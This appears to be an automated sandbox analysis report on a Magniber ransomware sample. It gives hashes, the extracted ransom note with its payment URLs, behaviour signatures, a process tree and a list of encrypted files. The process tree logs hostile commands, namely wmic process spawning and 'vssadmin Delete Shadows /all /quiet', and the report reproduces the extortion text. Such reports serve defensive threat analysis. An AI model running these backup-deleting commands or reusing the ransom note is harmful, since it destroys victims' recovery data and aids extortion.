Overview

overview

10

Static

static

4a8291d1b7...c7.exe

windows7_x64

10

4a8291d1b7...c7.exe

windows10_x64

10

Analysis

  • max time kernel
    133s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-06-2021 01:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4a8291d1b7e90e942220471d1335a544d59791d693a3065f0cff46632cd821c7.exe

  • Size

    21KB

  • MD5

    e0fa3beea2fdf9c48e26d128f624aa90

  • SHA1

    d853e4f29d2832c3830441613cfe7f23889c660e

  • SHA256

    4a8291d1b7e90e942220471d1335a544d59791d693a3065f0cff46632cd821c7

  • SHA512

    4a549ec73a4e0fbc5285152bcb5c35da95d9bcc79e7f0b1c1d844bc4ce5d6639084246fea4a7e79285a12c82fa59046cef8a77870db895f573a88df6ec601dcf

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://e4c440b8b640c0c0cnaoekeon.ndkeblzjnpqgpo5o.onion/cnaoekeon Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://e4c440b8b640c0c0cnaoekeon.wonride.site/cnaoekeon http://e4c440b8b640c0c0cnaoekeon.lieedge.casa/cnaoekeon http://e4c440b8b640c0c0cnaoekeon.bejoin.space/cnaoekeon http://e4c440b8b640c0c0cnaoekeon.oddfelt.casa/cnaoekeon Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://e4c440b8b640c0c0cnaoekeon.ndkeblzjnpqgpo5o.onion/cnaoekeon

http://e4c440b8b640c0c0cnaoekeon.wonride.site/cnaoekeon

http://e4c440b8b640c0c0cnaoekeon.lieedge.casa/cnaoekeon

http://e4c440b8b640c0c0cnaoekeon.bejoin.space/cnaoekeon

http://e4c440b8b640c0c0cnaoekeon.oddfelt.casa/cnaoekeon

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 1 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Local\Temp\4a8291d1b7e90e942220471d1335a544d59791d693a3065f0cff46632cd821c7.exe
      "C:\Users\Admin\AppData\Local\Temp\4a8291d1b7e90e942220471d1335a544d59791d693a3065f0cff46632cd821c7.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1084
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:652
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1724
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1476
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:836
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:320
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1236
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:596
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
            PID:852
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:316
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://e4c440b8b640c0c0cnaoekeon.wonride.site/cnaoekeon^&1^&37970999^&54^&261^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://e4c440b8b640c0c0cnaoekeon.wonride.site/cnaoekeon&1&37970999&54&261&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1280
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1280 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:2256
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1744
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2088
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
            PID:2220
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2548
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2284
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2476
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2120
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                  PID:2208
                  • C:\Windows\system32\wbem\wmic.exe
                    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                    3⤵
                      PID:2500
                • C:\Windows\system32\cmd.exe
                  cmd /c CompMgmtLauncher.exe
                  1⤵
                  • Process spawned unexpected child process
                  • Suspicious use of WriteProcessMemory
                  PID:2080
                  • C:\Windows\system32\CompMgmtLauncher.exe
                    CompMgmtLauncher.exe
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2240
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2488
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:2164
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                        PID:2296
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2528
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2784
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2776
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2768
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2792
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2820
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:3004

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9X4Z4DFE.txt
                          MD5

                          2cf19fc0eae6adf69e96e460f30b50fe

                          SHA1

                          9a339451218b5457c250b045106bb0f42d42c012

                          SHA256

                          80594f7c9f75b9786d4e4deda0642feb83287001107f7784aaf2d2b18d8708b3

                          SHA512

                          5dd00698638903f8972c2e34b68b8c72621119da0a5bcb6ec850e5a96018efde799f937b488d0be794fd5d6e59ec640e1c1a63c8e2091237e02837d8d23a0a00

                          Download Submit

                        • C:\Users\Admin\Desktop\ConfirmJoin.dib.cnaoekeon
                          MD5

                          bd1f02fe5e682494c9a3214191c13fcc

                          SHA1

                          d7fc37e8e9ceab3aa21e3183bcb71d0f4d7658ad

                          SHA256

                          db1cef2573ede05d0752bc06f31e1b623e6754fbd23f64f4186bfc8f8989fa9f

                          SHA512

                          cc5d4b78bcf78f46743a57dcb82313da0a71a93df212111fc233cc8c7d1a22faf5c252d035f4303184753c30b937dcdf60f775fcf3da404c0fd3543fe7153b94

                          Download Submit

                        • C:\Users\Admin\Desktop\ImportUnpublish.wmv.cnaoekeon
                          MD5

                          3c4e818002c1b61b55d467d0b797ae12

                          SHA1

                          279255a90a73df54173c0586078fcf671d2999a8

                          SHA256

                          eef7b9d24976585c5739f4acfcf0d9c50453b00fe9a056f53b975a28852fe475

                          SHA512

                          3077f365d118a883f84adce11e38e85f70b8c72d570bb444471940faed147f96c7dc616994ff8e6a53a4d8790008fcd6119d4edf9970899b43d7fd689e32fa7a

                          Download Submit

                        • C:\Users\Admin\Desktop\ResetRegister.mpg.cnaoekeon
                          MD5

                          f47d9de55fd17a3809920c941ae52e98

                          SHA1

                          1f21790a65aa7a9244265c93b812d72f5f5501d1

                          SHA256

                          d0160a171430e5ac059f46a1245591b87e8fc99edcd8b8d6b4f47c555a950681

                          SHA512

                          8b4f83928f03f34257e915e84b7fbea377dab7643ccb208a587978fb1752816d1506d26af53291647a3bb41da76649ca5d9961c29b546ef99e9d079d85c72ff2

                          Download Submit

                        • C:\Users\Admin\Desktop\SearchConvertTo.raw.cnaoekeon
                          MD5

                          71535eae9498801c7cbdd336e9e7e635

                          SHA1

                          c0be16a80d880f4508733fba1f0e3e8b9d1677f9

                          SHA256

                          31661215f70297015a74cb91f09f3c045640061684ac0b17fd29daac6cd8f5fd

                          SHA512

                          9838467b31473656dbf50eb969b87cf1c03dd350476ee817824e7e7dd90e479150f723748f87aefafe49f963ed5bec8d89b0410135ecb26692b4972865f08282

                          Download Submit

                        • C:\Users\Admin\Desktop\UnprotectTrace.vsd.cnaoekeon
                          MD5

                          6fedffa5c1c64874b2a0ee87af4a4636

                          SHA1

                          862a926d62cd5e95f36afbcf1496083d9a7a527b

                          SHA256

                          530f60268972110affeb648b608991e4c4bf54d3ec996fd526329fe5ad2cb29c

                          SHA512

                          e0fe8f1c0b3f23a1ca47c025d7c85e1aaddcbd97b3a34533d359018c2668ff1be01ad03b2ec4257ced7c8d716a510f5d2018b1f623439a84e0ecab58daf74764

                          Download Submit

                        • C:\Users\Admin\Desktop\UnregisterComplete.raw.cnaoekeon
                          MD5

                          6600c358999714fe394a803b6b58aceb

                          SHA1

                          1240c75ab32a3de53ad5407fa8c5735f199584ec

                          SHA256

                          c353f3ee99222563958e668e7b6c030460887c494e714d95d21f7ea37c9a9ab3

                          SHA512

                          a8f2103528e81172e6ac441d373bc4629e459cab18de34e19da88d4d44f4a32196d180377ea38230420a868a2300f9097f7331f14897a9f7c01efdf348c6f1e0

                          Download Submit

                        • C:\Users\Admin\Desktop\UnregisterDeny.js.cnaoekeon
                          MD5

                          b4c6ba17d526b55be82aaee198a4a5be

                          SHA1

                          b3d0b20717d7c6918797964e5b2c818da5180cd5

                          SHA256

                          1f298c16291c8fc9a95309a24db27c1f2d20d53a7905f7257e578dc1f6919652

                          SHA512

                          aa1c33f2dc8f26eb15d6e7aa926ca6bad86744b1e475ed17bf93f42b2498ab52605d29b65577858c6d195e5d4d1cb8ff950578fb39e114e2b754ae96058ef4bc

                          Download Submit

                        • C:\Users\Admin\Desktop\readme.txt
                          MD5

                          1445ae4a7a8579fb80eccdd41e3b9044

                          SHA1

                          f9f573806d1b86e90d46c404f40d2f26734fd07c

                          SHA256

                          f44fce8f05b8fb8c2537e11d563f0cef201c007418a76eabb89e7fa84d3ad5b1

                          SHA512

                          84456ea008e592986022512c784c51482da005cca840a5e8f91e66bde4f57f4bb19dff7e24195e4aed3a8e03909e975bd54bebe64f8e5626c4830851261a729a

                          Download Submit

                        • C:\Users\Public\readme.txt
                          MD5

                          1445ae4a7a8579fb80eccdd41e3b9044

                          SHA1

                          f9f573806d1b86e90d46c404f40d2f26734fd07c

                          SHA256

                          f44fce8f05b8fb8c2537e11d563f0cef201c007418a76eabb89e7fa84d3ad5b1

                          SHA512

                          84456ea008e592986022512c784c51482da005cca840a5e8f91e66bde4f57f4bb19dff7e24195e4aed3a8e03909e975bd54bebe64f8e5626c4830851261a729a

                          Download Submit

                        • memory/316-90-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/316-89-0x0000000000000000-mapping.dmp

                          Download

                        • memory/320-104-0x0000000000000000-mapping.dmp

                          Download

                        • memory/596-105-0x0000000000000000-mapping.dmp

                          Download

                        • memory/652-102-0x0000000000000000-mapping.dmp

                          Download

                        • memory/836-112-0x0000000000000000-mapping.dmp

                          Download

                        • memory/852-111-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1084-88-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1084-62-0x00000000000E0000-0x00000000000E1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1084-61-0x0000000000020000-0x0000000000025000-memory.dmp

                          Filesize

                          20KB

                          Download

                        • memory/1084-63-0x00000000000F0000-0x00000000000F1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1084-64-0x0000000000100000-0x0000000000101000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1084-65-0x0000000000110000-0x0000000000111000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1280-110-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1288-60-0x0000000002A00000-0x0000000002A10000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/1476-103-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1600-92-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1636-93-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1724-109-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1744-107-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1800-108-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2208-113-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2220-114-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2240-115-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2256-116-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2256-120-0x00000000752F1000-0x00000000752F3000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2284-118-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2296-119-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2476-125-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2488-126-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2500-127-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2528-128-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2548-129-0x0000000000000000-mapping.dmp

                          Download